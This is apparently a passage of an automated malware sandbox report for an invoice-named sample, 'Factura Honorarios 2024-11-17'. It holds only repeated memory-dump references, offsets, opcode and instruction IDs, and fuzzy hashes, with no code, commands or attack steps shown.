                                                                                                                                  • Instruction Fuzzy Hash: 90D1C075B046048FDB05DB68C890A9E7BB2FFC9320F1545AAE505EB3A2DB31DD41CBA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5006d962fbcc95897af7f160ebd11f66d3dd7abfb0a2c158067ba162185ec913
                                                                                                                                  • Instruction ID: d38294895e27078f83edd5a97979406018a00e40d17a18230f1f56da08109801
                                                                                                                                  • Opcode Fuzzy Hash: 5006d962fbcc95897af7f160ebd11f66d3dd7abfb0a2c158067ba162185ec913
                                                                                                                                  • Instruction Fuzzy Hash: 7EB19C30708211CFDB159B24C894B7E7BB6AFC9302F54856AE816CB3A1DB34CC8AD791
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 009d6f887f20fb4b1dbd0f113bf669585eef18ed369326a4bf787fc7aa6d0fcc
                                                                                                                                  • Instruction ID: 47ae8fd56a98b6feb3060b4d41d61e8d736dd2632be3543d42a9ef23be7558d6
                                                                                                                                  • Opcode Fuzzy Hash: 009d6f887f20fb4b1dbd0f113bf669585eef18ed369326a4bf787fc7aa6d0fcc
                                                                                                                                  • Instruction Fuzzy Hash: 8C81CF34B10606CFD704DF78C9A4A5E7BF2BF89640B1581A9E506DB3A1EA31EC42CF91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d63224a5bb4b25ee57240fe78722ae39dd9663921a2f1365c5324d74967a1d80
                                                                                                                                  • Instruction ID: a4045f33b0276e9f94b6d2496a77726fe04789d2f4dde31e666d67ad34223661
                                                                                                                                  • Opcode Fuzzy Hash: d63224a5bb4b25ee57240fe78722ae39dd9663921a2f1365c5324d74967a1d80
                                                                                                                                  • Instruction Fuzzy Hash: 1E81A030A00505CFDB58CF69C484969BBB2FF89312BA58169D825EF365DB31EC49CBE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dd0a2ac89056eecb50c5e638f402408636eeb542a2e461bf8be34c5dc67329bb
                                                                                                                                  • Instruction ID: 88a0ea420d594526a6207ff031fac119b886db9b104a59e03d3eb9fc0f727b4a
                                                                                                                                  • Opcode Fuzzy Hash: dd0a2ac89056eecb50c5e638f402408636eeb542a2e461bf8be34c5dc67329bb
                                                                                                                                  • Instruction Fuzzy Hash: 7C61FEB6B047059FD7148BB8D840AAABBB9FFD5324B14896AE458C7760D7309901CBA0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cae7656a4fc1be91c282ae90d28ea6f71ceccbccb48966f04b8bca820eb78111
                                                                                                                                  • Instruction ID: 529bf3340f5ef710865eb22316093db51f05495760ff53cba16c16f4117459b1
                                                                                                                                  • Opcode Fuzzy Hash: cae7656a4fc1be91c282ae90d28ea6f71ceccbccb48966f04b8bca820eb78111
                                                                                                                                  • Instruction Fuzzy Hash: 1571F634700A05CFCB15DF68C884A6A7BE6AF99342F1540A9E826EF371DB70DC46CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 822ae7ac59f3aa357714d231a5e61326caf07ba63fd8a3f07ef29f2e78b8ebd3
                                                                                                                                  • Instruction ID: dd9dcad0b1ace233729b17a727dc608f4045fba3b9a541084e9262c4412faa94
                                                                                                                                  • Opcode Fuzzy Hash: 822ae7ac59f3aa357714d231a5e61326caf07ba63fd8a3f07ef29f2e78b8ebd3
                                                                                                                                  • Instruction Fuzzy Hash: BC819274E412688FDB65DF29DD51BDDBBB2BB89300F1081EAD949A7250DB305E81CF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8096f57bde2ff8fceeebaf7aa1a199ef0f921b209f0f63a9d057fbca9a35ec27
                                                                                                                                  • Instruction ID: 6d5163a8a7638582309010dca8f5ece53d969cb54877fc5732c4da84fc0d825c
                                                                                                                                  • Opcode Fuzzy Hash: 8096f57bde2ff8fceeebaf7aa1a199ef0f921b209f0f63a9d057fbca9a35ec27
                                                                                                                                  • Instruction Fuzzy Hash: 37719E74E00218CFEB14DFA9C994A9DBBF2BF89300F648129D815BB355EB359942DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d9810a6d7bf0f256cd6d0b554f044768d963c35a17da6fcb3300fab16dd2757a
                                                                                                                                  • Instruction ID: f44aa015c6e388c9629a8ddc25952575c6643583725ac9cace9bd1b0e46f8df0
                                                                                                                                  • Opcode Fuzzy Hash: d9810a6d7bf0f256cd6d0b554f044768d963c35a17da6fcb3300fab16dd2757a
                                                                                                                                  • Instruction Fuzzy Hash: D671B174E00208CFEB14DFA9C994A9DBBF2BF89300F64812AD815BB355EB359942DF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • Instruction Fuzzy Hash: 0231C474E01608CFEB18CFAAD9546DEBBF2AF89300F64842AD418BB254DB345946CF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cab2d4ba2e7090ecdffd925193cab1f6fcf9afb7c068e666312176c880c12230
                                                                                                                                  • Instruction ID: a6750668c7c08d6d3488971430f4e87b2e4974c73aab771a96afe5e58be806ee
                                                                                                                                  • Opcode Fuzzy Hash: cab2d4ba2e7090ecdffd925193cab1f6fcf9afb7c068e666312176c880c12230
                                                                                                                                  • Instruction Fuzzy Hash: C831D274E006588BEB18CFAAD8506DEBBF2AF89300F54D12AC418BB354DB355946CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bc5797ed6847c35ed11f4063eec97e0091ccaeed27c7d91abe701f20955b4e9d
                                                                                                                                  • Instruction ID: 0b1adaba2ef72f84823168e05312b1b18ecf52c078374383a9d66b3fd5dbf69c
                                                                                                                                  • Opcode Fuzzy Hash: bc5797ed6847c35ed11f4063eec97e0091ccaeed27c7d91abe701f20955b4e9d
                                                                                                                                  • Instruction Fuzzy Hash: 3331B275E01608CBEB18CFAAD8506DEBBF2AF89300F50D52AC418BB255EB345946CF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7aa599740adb4c11a6f5f90b4bc06d1d0391c3cf8c0442ada6e760df90bea437
                                                                                                                                  • Instruction ID: 78b4397c094faf5925daa447b361283344a8964a76edcad7a8be1762f958cd4d
                                                                                                                                  • Opcode Fuzzy Hash: 7aa599740adb4c11a6f5f90b4bc06d1d0391c3cf8c0442ada6e760df90bea437
                                                                                                                                  • Instruction Fuzzy Hash: C331B474E01648CBEB14CFAAD9546DDBBF2BF89300F54D12AD418BB254EB385906CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 811c23729250e2b1fc96a82610f6749a6348dc85fb22b60b9520b7b8bb6fac9c
                                                                                                                                  • Instruction ID: 888ebbefe4182c5ae0be4c3156a49e366fea39dc7d2c239ccd85ae26923cc073
                                                                                                                                  • Opcode Fuzzy Hash: 811c23729250e2b1fc96a82610f6749a6348dc85fb22b60b9520b7b8bb6fac9c
                                                                                                                                  • Instruction Fuzzy Hash: 2331B175E01248CFEB18CFAAD8506DEBBF2AF8A300F50D52AD818BB254DB745946CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a4ff52f5281f66250c87674c551463fbd12833b8118e39ceea7490553965a7bd
                                                                                                                                  • Instruction ID: a25f90608266fdf4ab54db01090504818a226a2060490e81e7d65185245fdcf3
                                                                                                                                  • Opcode Fuzzy Hash: a4ff52f5281f66250c87674c551463fbd12833b8118e39ceea7490553965a7bd
                                                                                                                                  • Instruction Fuzzy Hash: 9F21FE30304203CBCB155B798864B7E36A6AFC571A7154039DC26EF6A5EF25CC8BE392
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1e1912ae9078da9eeba4656769eb6d360e14a3a3eed896e3e29e805180260d40
                                                                                                                                  • Instruction ID: cb3457233382b6814e102ebea702d4d267ddeb36989c7cc0302be06366f4a8e2
                                                                                                                                  • Opcode Fuzzy Hash: 1e1912ae9078da9eeba4656769eb6d360e14a3a3eed896e3e29e805180260d40
                                                                                                                                  • Instruction Fuzzy Hash: 9231D474E01648CBEB14CFAAD5906DEFBF2AF89300F64D52AC418BB254EB395902CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 04a09812c3e3ecc160655734e585353bf83258605402ea15f17e6b4b09317186
                                                                                                                                  • Instruction ID: b1030039a15a04467a5faff7399d1d8c838698eb38fbb7206da523d7df1a5045
                                                                                                                                  • Opcode Fuzzy Hash: 04a09812c3e3ecc160655734e585353bf83258605402ea15f17e6b4b09317186
                                                                                                                                  • Instruction Fuzzy Hash: 5E310430A08384DFDB059B74D81565D7FB6FFC6310F2480AED5459B6A2CB314E45CB61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 31ec595fcc6febde6ce2cd09b372c25ecda8b983daa7d23f2fe4cdf85cca620b
                                                                                                                                  • Instruction ID: bc1db0fa0236f6b2fa96515491912e6730d0a907f47cdc6995fd3d91c3fa7955
                                                                                                                                  • Opcode Fuzzy Hash: 31ec595fcc6febde6ce2cd09b372c25ecda8b983daa7d23f2fe4cdf85cca620b
                                                                                                                                  • Instruction Fuzzy Hash: D4418375E01208CFDB48DFAAD89499DBBF2BF89301F248129E815BB325DB349846CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5ae537c960058b07b50be84e79bd1ed0ab84050771f3649c524573bd7b16269e
                                                                                                                                  • Instruction ID: 18b1c81a55312f71ca311843083a2713e3fab26ef6a60be3bed6fcd52e1ea2d8
                                                                                                                                  • Opcode Fuzzy Hash: 5ae537c960058b07b50be84e79bd1ed0ab84050771f3649c524573bd7b16269e
                                                                                                                                  • Instruction Fuzzy Hash: 86217130304213CBDB145A658854B7F7696AFC475AF248039DC16EF7A4EF76CC86A391
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 38a6bec8c95714c2a632dcb7003573d9516b5c5499ed58dc2d1cbb9e7fea66b0
                                                                                                                                  • Instruction ID: d233c10987048402517691c801b95e93b741434ad5be499962c2145fbccd41af
                                                                                                                                  • Opcode Fuzzy Hash: 38a6bec8c95714c2a632dcb7003573d9516b5c5499ed58dc2d1cbb9e7fea66b0
                                                                                                                                  • Instruction Fuzzy Hash: 1E216D76A00115DFCF14DB24C8409AE77A9EB9E364F20C11DD91A9B390DB36EE4ACBD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a780753ac663f29991d6a487b9648f5560ae04f60fa6cfda442db442158d157d
                                                                                                                                  • Instruction ID: e999c55e63140573e7b7176dfaa55f08263c8b6d87a18125b9299a1524efcbb3
                                                                                                                                  • Opcode Fuzzy Hash: a780753ac663f29991d6a487b9648f5560ae04f60fa6cfda442db442158d157d
                                                                                                                                  • Instruction Fuzzy Hash: 9021DE35300611CBC7199B29C898A2EB7A2FF897527558129E92ADB7A4CF31DC068BD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2656820381.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_ad000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 12aae3944cb78008acac82ea3cf948efadb2c9b653cc5b26c2818203813fe643
                                                                                                                                  • Instruction ID: 94ec79aec18f3e120e67a1e9040b7fa23c32662e6bb1c831638cf9986aee5142
                                                                                                                                  • Opcode Fuzzy Hash: 12aae3944cb78008acac82ea3cf948efadb2c9b653cc5b26c2818203813fe643
                                                                                                                                  • Instruction Fuzzy Hash: E4212575604304AFDB10CF60D9C4F16BBA1FB85314F20C66EE94A4B642C73AD846CA62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • Instruction Fuzzy Hash: B8111B75D0420AEFDB01CFA8C8549AEBBB1FB4A300F414465DA10A7350E7355A1ADF92
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1101601f1505a8868de287298a0e8191a93f1eff579519a54fe0497b2b7c670d
                                                                                                                                  • Instruction ID: 18d0f4b165f8eb3479790da6eda56b606d57b61e345929fbf02b4806df3fd48c
                                                                                                                                  • Opcode Fuzzy Hash: 1101601f1505a8868de287298a0e8191a93f1eff579519a54fe0497b2b7c670d
                                                                                                                                  • Instruction Fuzzy Hash: 90F0FC31380210CB87155A2EE85462A76EEEFC8B52395417AEC19CF361EF21CC478381
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ecc7958e8b9c40c713c255a06cb6f5ffe847d4a72e020eb2f11a74d8d0e84abd
                                                                                                                                  • Instruction ID: 8119533eea7fdf848c9925c4d3efc0883e1f6a7ad7c718a0fab73c2454853f7c
                                                                                                                                  • Opcode Fuzzy Hash: ecc7958e8b9c40c713c255a06cb6f5ffe847d4a72e020eb2f11a74d8d0e84abd
                                                                                                                                  • Instruction Fuzzy Hash: AAF03135300215EFDB085AA59854A6BAA9BEBC8361B148429B94AC7351DF71CC4593E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2773e2064b82a0a528b706826932cd8464a87ec0b1c20f8d00a4354b14d5e463
                                                                                                                                  • Instruction ID: 84157ed8ed44b88b2973e1f8514e99a22945c1ec13cd8ff5c558f51bd96611f1
                                                                                                                                  • Opcode Fuzzy Hash: 2773e2064b82a0a528b706826932cd8464a87ec0b1c20f8d00a4354b14d5e463
                                                                                                                                  • Instruction Fuzzy Hash: 62F04636B086508FC70A8739A41495ABBBEDFC726070404EBE008CB361EA32CC02C7A5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 739f137f4942ab39f766ce0f1c8a0e52a71bbf8808a47d78d8e16ed908a22adf
                                                                                                                                  • Instruction ID: a807900a054e806cdc42540d969e123c70f7a7d51b1b6543d835dddaa1bd44e6
                                                                                                                                  • Opcode Fuzzy Hash: 739f137f4942ab39f766ce0f1c8a0e52a71bbf8808a47d78d8e16ed908a22adf
                                                                                                                                  • Instruction Fuzzy Hash: DAF02232A043089FDB50DFA9D84199FBFF6FF8834075041AEE80497211E7319912CBA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 295cfdb4188e9ee894c7d1c9d08bed4f3fa972284c983e2842e8c45978d0abc6
                                                                                                                                  • Instruction ID: 2d5005f3ef78bc49579544db60dd456a7395745e4bca3951b302aded612b1f30
                                                                                                                                  • Opcode Fuzzy Hash: 295cfdb4188e9ee894c7d1c9d08bed4f3fa972284c983e2842e8c45978d0abc6
                                                                                                                                  • Instruction Fuzzy Hash: 6601E470E0031ADBCF44EFB9C9116AEBBF5BF88241F4085AAD519E7250EB3999018F91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                                                                  • Instruction ID: 0c3463949ee1ae525ac12f5af34df97a838c65e52c2bb33d2cf00fd7680a4862
                                                                                                                                  • Opcode Fuzzy Hash: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                                                                  • Instruction Fuzzy Hash: 0601D176608244DFCB159F64DC80B88BF71BF8A324F580296E9209B2E2C7308C14CB10
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9c61f84ad8e4cc45ebcc365db03757658db89284ecd7101cf148c1dbd85ce70a
                                                                                                                                  • Instruction ID: b97b6347823dd5b9d346d07a6855d74519bc2e6ebd34111a7b2ac838a6e976c5
                                                                                                                                  • Opcode Fuzzy Hash: 9c61f84ad8e4cc45ebcc365db03757658db89284ecd7101cf148c1dbd85ce70a
                                                                                                                                  • Instruction Fuzzy Hash: 80F012353406148FD708AB2AE96492A37EAEFC4751B0540A9F509CB7A1DE70DC41CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48cd6765b9ba6db4ed2a0040aec36ebf61d6d3447b4f558d43814614e2ad5fb1
                                                                                                                                  • Instruction ID: 79452a1c1de6655effa1e1cf286bb44ea15634472633d97c9da5ea83a13035dd
                                                                                                                                  • Opcode Fuzzy Hash: 48cd6765b9ba6db4ed2a0040aec36ebf61d6d3447b4f558d43814614e2ad5fb1
                                                                                                                                  • Instruction Fuzzy Hash: 5DF05E35301605DFD700DF5AD884D5ABBEAFF887247508169E60987330CB719D51CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: db35491cda03046404be204d507322598624716241c72051db36d2181584241e
                                                                                                                                  • Instruction ID: 977cc38f6d245737ca21b7ceae0438194b7128da752eef8d8469b04be3cadf8e
                                                                                                                                  • Opcode Fuzzy Hash: db35491cda03046404be204d507322598624716241c72051db36d2181584241e
                                                                                                                                  • Instruction Fuzzy Hash: 95E08C340483814FCB03A775A8944883F72AF82100B0442A5D5099F5BBDFB80A8A8B62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2db57f94c1a11846ba630e2626c5793562846ae42eb2105db4cdafdbcb440977
